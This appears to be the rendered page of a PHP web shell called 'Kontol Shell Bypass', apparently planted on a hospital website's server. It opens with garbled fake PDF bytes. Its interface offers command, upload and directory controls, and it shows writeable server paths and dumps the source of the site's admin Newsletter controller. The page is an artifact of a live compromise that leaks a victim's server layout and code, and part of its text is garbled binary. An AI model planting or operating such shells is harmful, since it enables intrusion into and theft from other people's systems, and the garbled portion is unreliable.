%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :
ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/hbackup/application/controllers/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/hbackup/application/controllers/admin/Newsletter.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

class Newsletter extends CI_Controller {

	function __construct() {
        parent::__construct();
        
        if((!isset($_SESSION['is_logged']))||($_SESSION['is_logged']==false))
        {
        	$_SESSION['redirect'] = base_url()."admin/Newsletter/view_newsletters";
        	
        	redirect(base_url().'admin/login');
        }
	//	redirect_admin_not_logged();
        $this->load->model('newsletter_model', 'newsletter');
    }
	
	public function index()
	{
		$this->view_newsletters();
	}
	
	public function do_upload($field_name, $upload_path= '', $file_name= '')
	{
		if($upload_path!=''){
			$config['upload_path'] = $upload_path;
		}
		else{
			$config['upload_path'] = './uploads';
		}
		$config['allowed_types'] = 'jpeg|jpg|png|JPEG|JPG|PNG|pdf';
		$config['max_size']     = '5000';
		$config['max_width'] = '2000';
		$config['max_height'] = '1500';
		if($file_name!=''){
			$config['file_name'] = $file_name;
		}
		$this->load->library('upload', $config);
		$this->upload->initialize($config);
		
		if ( ! $this->upload->do_upload($field_name))
		{
			$error = array('error' => $this->upload->display_errors());
			
			echo '<script>console.log("'.$error['error'].'")</script>';

	//		$this->load->view('upload_form', $error);
			
			return 0;
		}
		else
		{
			$data = array('upload_data' => $this->upload->data());

			return $this->upload->data('file_name');	
			
		}

	}
	
	public function add_newsletter($id=0)
	{
		
		$data = array();
		$data['data_string'] = '';
		$newsletterID = $id;
		
		echo '<script>console.log("add newsletter")</script>';
		
		if($id){
		
			$records = $this->newsletter->get_newsletter($id);
			
			echo '<script>console.log("update newsletter")</script>';
			
			if(!$records){
				
				show_404();
				
			}
			else{
				
				$data = array(
					'newsletterID' => $records['newsletterID'],
					'newsletterTitle' => $records['newsletterTitle'],
					'newsletterDescription' => $records['newsletterDescription'],
					'newsletterPdf' => $records['newsletterPdf'],
					'status' => $records['status'],
					'newsletterPageURL' => $records['newsletterPageURL']
				); 
				
			}

		}
		
		$post=$this->input->post();
		
		if($post){	
			
			echo '<script>console.log("post")</script>';
			
			$this->form_validation->set_rules('newsletterTitle', 'Newsletter Title', 'required');
			$this->form_validation->set_rules('newsletterPageURL', 'Newsletter Slug', 'required');
//			$this->form_validation->set_rules('profile_pic', 'Profile Picture','required'); 
			
			if ($this->form_validation->run() == FALSE)
            {
            		echo '<script>console.log("Error in validating newsletter")</script>'; //console.log("Error in validating doctor");
  		          //  $this->load->view('admin/AddNewsletter');
            }
			else
			{
				
				$document ='';
				
				if($_FILES['document']['name']){
					$document = $this->do_upload('document', './uploads/files', 'nl_document_'.$post['newsletterPageURL']);
					$data['error'] = array('error' => $this->upload->display_errors());	
				}
				
				
				if(($_FILES['document']['name'])&&(!$document)){
					echo '<script>console.log("fail upload")</script>';
				}
				else{
					if(isset($post['newsletterID'])){
						$newsletterID = $post['newsletterID'];
					}
				
					$insert_data = array(	
						'newsletterTitle' => $post['newsletterTitle'],
						'newsletterDescription' => $post['newsletterDescription'],
						
						'status' => $post['status'],
						'newsletterPageURL' => $post['newsletterPageURL']
					);
					
					if($document!=''){
						$insert_data['newsletterPdf'] = $document;
					}
				
					$success = '';	
					 echo '<script>console.log("'.$newsletterID.'")</script>';
					if($newsletterID){
						$success = $this->newsletter->update_newsletter($insert_data,$newsletterID);
					}
					else{
						
						$success = $this->newsletter->insert_newsletter($insert_data);
						echo '<script>console.log("'.$success.'")</script>';
					}			
				
					if($success){
						redirect(base_url()."admin/Newsletter/view_newsletters");

					};
				}
			}
       			
		}
		
		$this->load->view('admin/AddNewsletter',$data);
	}
	
	
	public function update_newsletter($id){
	
		$this->add_newsletter($id);
	}
	
	
	
	public function view_newsletters()
	{
		$data = array();
		$data['records'] = $this->newsletter->get_newsletters();
		if(!$data){
			show_404();
		}
		$this->load->view('admin/ViewNewsletter',$data);
	}
	
	public function remove_newsletter($id){
        
        $data = array();
		$data1 = array();
		$newsletterID = $id;
		// $id = $_GET['id'];
   
		if($this->newsletter->delete_newsletter($id)){
			$data1['msg'] = 'Record deleted succesfully';
		}
		else{
			$data1['msg'] = 'Record could not be deleted';
		}
		
		$data['records'] = $this->newsletter->get_newsletters();
			
		if(!$data){
			show_404();
		}
				
		$this->load->view('admin/ViewNewsletter',$data);

    }
	
	
	
	
	
}

Kontol Shell Bypass